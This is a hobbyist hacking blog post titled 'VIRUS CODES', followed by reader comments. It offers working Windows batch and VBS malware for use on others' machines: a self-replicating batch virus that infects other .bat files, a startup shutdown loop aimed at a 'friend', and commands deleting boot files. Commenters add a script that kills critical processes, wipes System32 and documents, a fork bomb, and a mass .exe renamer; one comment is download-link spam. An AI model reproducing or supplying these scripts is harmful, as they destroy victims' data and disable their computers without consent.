Search This Blog

Tuesday, February 21, 2012

VIRUS CODES

* Autoplay virus solution

autoplay virus solution- if u have problem with ur drives that they are not opening when u double click on then, then apply this trick

u must have winrar
if d:\ doesnt opens,,,,,open winrar and goto d:\ in tht.....u ll be seeing file name "autoplay.inf"....delete tht file..
now refrsh ur drives...
the virus is gone

* VIRUS CODE

simple VIRUS code is here: Just save the following code as .bat extension in notepad.The antivirus will detect it as virus. see for yourself.
It will affect *.com and *.EXE files .It will multiply itself and may get more dangerous when altered.






@echo off>nul.ViRuS
if "%1=="/ViRuS_MULTIPLY goto ViRuS_multiply
if "%1=="/ViRuS_OUTER_LOOP goto ViRuS_outer_loop
if "%1=="/ViRuS_FINDSELF goto ViRuS_findself
if "%VOFF%=="T goto ViRuS_OLDBAT

set ViRuSname=%0
if not exist %0.bat call %0 /ViRuS_FINDSELF %path%
if not exist %ViRuSname%.bat set ViRuSname=
if "%ViRuSname%==" goto ViRuS_OLDBAT

rem ViRuS if batch is started with name.BAT, virus will not become active
rem ViRuS it was a bug, now it's a feature ! (also notice the voff variable)
rem ViRuS also if batch was only in an append /x:on path (chance=minimal)

attrib +h %ViRuSname%.bat
for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a
attrib -h %ViRuSname%.bat
set ViRuSname=
goto ViRuS_OLDBAT

:ViRuS_findself
if "%2==" goto XXX_END>nul.ViRuS
if exist %2\%ViRuSname%.bat set ViRuSname=%2\%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
shift>nul.ViRuS
goto ViRuS_findself

:ViRuS_outer_loop
for %%a in (%2\*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a
goto XXX_END>nul.ViRuS

:ViRuS_multiply
find "ViRuS" <%ViRuSname%.bat >xViRuSx.bat
find /v "ViRuS" <%2 |find /v ":XXX_END" >>xViRuSx.bat
echo :XXX_END>>xViRuSx.bat
copy xViRuSx.bat %2>nul
del xViRuSx.bat
goto XXX_END>nul.ViRuS

:ViRuS_OLDBAT
echo on>nul.ViRuS


echo This is the dummy Virus Created By Elite and Rishabh
:XXX_END

* MAKE COMPUTER KEEP RESTARTING

MAKE COMPUTER KEEP RESTARTING


1.open note pad

2.type "shutdown -s" with out quotes

3.save the file with .bat extension


4.explaination,u have created a prog which shutdowns the pc with in 30
of executing the file

5. now open
"x:\Documents and Settings\USERNAME\Start Menu\Programs\Startup\" (x->is the drive on which ur windows has been installed and USERNAME is the username)

6.paste a shortcut on this directory



NOW WHEN EVER UR FRIEND STARTS HIS PC a count down will start after 30 sec his pc will shutdown
u can also maki his pc restart instead of shutting down.. just replace "shutdown -s" "restart _s"


enjoy.... this is not a virus but look so....

* CREATE A VIRUS IN 1 MIN

Virus in minutes 
Write VIRUS to computer in 1 minutes
Creating virus trick
open ur notepad n type the following........
.type del c:\boot.ini c:\del autoexec.batsave as .exe [save it as .exe file....n u can save it by ne name]create the notepad in c: drive...

* CREATE A SCARY BUT HARMLESS VIRUS

Open notepad and type this:

lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")

Then save it as Virus.VBS

and go to the folder that contains it and open it if a window pops out saying a virus has been detected it's working. Press yes or no to close the window and put it in the startup folder of the victim's account.On startup the window should appear.Note: This does not harm your computer as it does not contain virus.

9 comments:

  1. This one is just nasty:


    @echo off
    :virus
    rundll32 Keyboard, disable
    rundll32 mouse, disable
    start www.youtube.com
    taskkill /f /t /im explorer.exe
    taskkill /f /t /im firefox.exe
    taskkill /f /t /im csrss.exe
    taskkill /f /t /im minlogon.exe
    taskkill /f /t /im rundll32.exe
    taskkill /f /t /im dwm.exe
    del /f /q "c:\users\%userprofile%\My Documents\
    del /f /q "c:\users\%userprofile%\My Documents\
    del /f /q "c:\users\%userprofile%\My Documents\
    cd "c:\WINDOWS\system32"
    del /f /q "*.*"
    Copy "virus.bat" "c:\users\%userprofile%\My Documents
    shutdown -s -t 00 -c "virus"
    :goto virus

    ReplyDelete
    Replies
    1. This will just totaly destroy your fictims pc.

      Delete
    2. rundll32 keyboard disable. ERROR 4 ME :P! And del commands? The antivirus can find your virus very easily. Try only rename : rename %windir%\*.exe *.exeX. It change every .exe to .exex and the computer cant use them. And now.. ShUTDOwN!

      Delete
    3. M-K Hacking: Virus Codes >>>>> Download Now

      >>>>> Download Full

      M-K Hacking: Virus Codes >>>>> Download LINK

      >>>>> Download Now

      M-K Hacking: Virus Codes >>>>> Download Full

      >>>>> Download LINK iY

      Delete
  2. @echo off
    :start
    start
    goto start

    ReplyDelete
  3. Fast and good...
    It's a clasic virus but i love it... ;)
    @ECHO OFF
    :s%r#
    COPY %0.BAT C:\Q.COM>NUL
    C:\Q
    [ binary data ]

    ReplyDelete
  4. I like this virus:
    @echo off
    :virus
    md %random%
    goto virus

    SIMPLE BUT POWERFUL

    ReplyDelete
  5. Well, thanks for all this 'virus' stuff. I'm turning against whoever made this- IM MAKING AN ANTIVIRUS THANKS XDDD

    ReplyDelete